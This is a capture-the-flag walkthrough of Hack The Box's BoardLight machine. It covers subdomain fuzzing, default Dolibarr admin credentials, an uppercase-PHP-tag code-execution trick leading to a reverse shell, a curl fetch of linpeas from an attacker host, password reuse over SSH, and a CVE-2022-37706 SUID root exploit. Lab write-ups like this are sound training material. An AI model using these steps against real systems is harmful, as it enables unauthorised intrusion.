Hi Everyone, we will be doing BoardLight from Hack the Box as we continue our TJNull list journey. Enjoy!
1)First, I started off by enumerating open ports on the target machine
nmap -sC -sV -A -T4 <TARGET_IP>
Not a lot happening here, only 2 ports open so far. Let’s dive into the Web Server running on port 80 as we don’t have any credentials for SSH yet.
2)I edited the /etc/hosts file and added “boardlight.htb” as the hostname. Website looks pretty basic, after little enumeration I decided to perform directory enumeration using dirsearch & ffuf, as well as subdomain enumeration using ffuf
2.1) Surprisingly, I didn’t find anything interesting with either directory enumeration and subdomain enumeration. I decided to take a step back and enumerate the website manually a little more.
2.2)I realized that Footer Section of the website indicates that maybe the hostname should be board.htb, that shouldn’t have an impact on the directory busting, but it can have an impact on subdomain enumeration. I decided to gave it a try as I didn’t have any better idea at the moment.
2.3)I quickly edited /etc/hosts file and replaced boardlight.htb with board.htb. After that I did subdomain fuzzing again with ffuf:
ffuf -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.board.htb" -u http://10.10.11.11Bingo! We got one hit! ###I used -fw flag to filter out the results based on the words count, very useful to see only true positives ###
2.4)I edited again /etc/hosts by adding crm.board.htb and by navigating to it, there is a login page, interesting!
2.5)From here we can see that Software Version is disclosed which definitely looks interesting, but before we go that route, I always like to check up for default credentials:
2.6)And it works! Amazing, we are in as an Administrator:
3)From here I decided to do some Google fo and to do some research on any available exploits for this version 17.0.0 of Dolibarr.
3.1)I ended up finding this amazing article which talks about RCE Vulnerability possible in Dolibarr: https://www.swascan.com/security-advisory-dolibarr-17-0-0/. There are many scripts on Github that automates this process of exploiting and getting the reverse shell, but I decided to really understand what is happening here, and why RCE is possible, I like to go that route.
3.2)It’s important to mention that Dolibarr will essentially enable us to create websites and to add web pages, also the App’s language is PHP.
For example, you can create a Website, and within HTML page you can simply create something to test it out as:
<h1>Beekeeper was here </h1>
3.3)Okay, back to the article, if we try to execute PHP code like this we will get error message:
3.4)But if we try php all in UPPERCASE -> PHP we got Arbitrary Code Execution
<?PHP echo 2+2;?>If we click on ‘Preview’ in the top-right corner we can see 4 as a result, great!
3.5)Let’s do one more test:
3.6)Okay, nice we have RCE, let’s leverage it to get a reverse shell.
Since we are dealing with PHP, I will use Pentest Monkey’s one that can be found here: https://www.revshells.com/
3.7)Simply put the PHP code from the script inside HTML page (don’t forget to change php tags to Uppercase), then start netcat listener.
Finally, click on the preview feature once when you create a page with PHP payload, and we get a shell as www-data!
4)I transfer the linpeas right away, to speed up the enumeration, but I didn’t find anything useful at the moment in the output:
4.1) Start the Python server on your attacker machine
python3 -m http.server 80004.2)Transfer linpeas to remote host using curl:
curl "http://10.10.10.10:8000/linpeas.sh" -O linpeas.sh4.3)I will keep linpeas on the remote host in case I need it later
4.4)Moving on to the further enumeration, since I know that Dolibarr is running on a Remote host and Linpeas did find out a Database on port 3306, I decided to enumerate it further. As I don’t have any credentials at the moment, let’s do some Google research to find out where the Database config file is located and how to connect to it.
I found out Dolibarr’s Wiki Page where I found out that we are looking for conf.php. Before I look for the configuration file, I decided to try the default credentials: dolibarr:dolibarr
mysql -h 127.0.0.1 -P 3306 -u dolibarr -pThat didn’t work out.
4.5)Okay, in that case, let’s see if we can find conf.php
Great, we have found conf.php and within it username and password for Dolibarr Database running on localhost. However if I try to connect to MySQL service running I am still getting access denied. Hm…
4.6)What about password re-use? I know from my initial enumeration that there is user Larissa on the target machine, let’s try to leverage SSH and connect as Larissa over port 22. Bingo!
5)We got user.txt. Let’s move to Privilege Escalation. My initial enumeration such as checking if we can run any commands as sudo and checking Kernel Version didn’t yield any interesting results. I decided to give it a try with Linpeas that we transferer earlier.
5.1)Upon checking the SUID check of Linpeas I found out something interesting, SUID binaries that are not common and I wasn’t familiar with:
5.2)I decided to do a quick Google Search for the enlightenment and to find out what it is. I found out: CVE-2022-37706. Looks promising as we have SUID bit set on enlightenment here. GitHub repo is very well formatted and the exploration path is very well documented, I will leave it here in case you want to find out more about this CVE. However, binary that we are interested in is: enlightenment_sys
5.3)From the Linpeas output we can see that SUID bit is set on enlightenment_sys, which is great. I downloaded exploit.sh from https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit. And then transferred it to the Target Machine.
5.4)That was enough to get a root shell, just by executing the bash script. Awesome, GG!
Lessons Learned
1) An interesting way to perform subdomain enumeration is by modifying /etc/hosts file to include the right hostname that we found out after enumerating the website. A good thing to remember whenever we are doing subdomain enumeration is that the correct hostname plays an important role.
2)Password re-use. Always a nice attack vector, here I did find the password for the Dolibarr Database but it wasn’t working for me when I tried to connect to the MySql Database running on port 3306. With further enumeration, I found out that there is a Larissa user present on the machine. With port 22 open, I gave it a try to connect as Larissa over SSH with a found password from conf.php and it worked out. Always worth checking possible password re-use.
3)Enumerate Linpeas output very well, as every detail matters. Here if we just skimmed through it we would miss those interesting SUID binaries thus missing the intended way of Privilege Escalation. Also, this way I learned about the new CVE: CVE-2022-37706.
Leave a Reply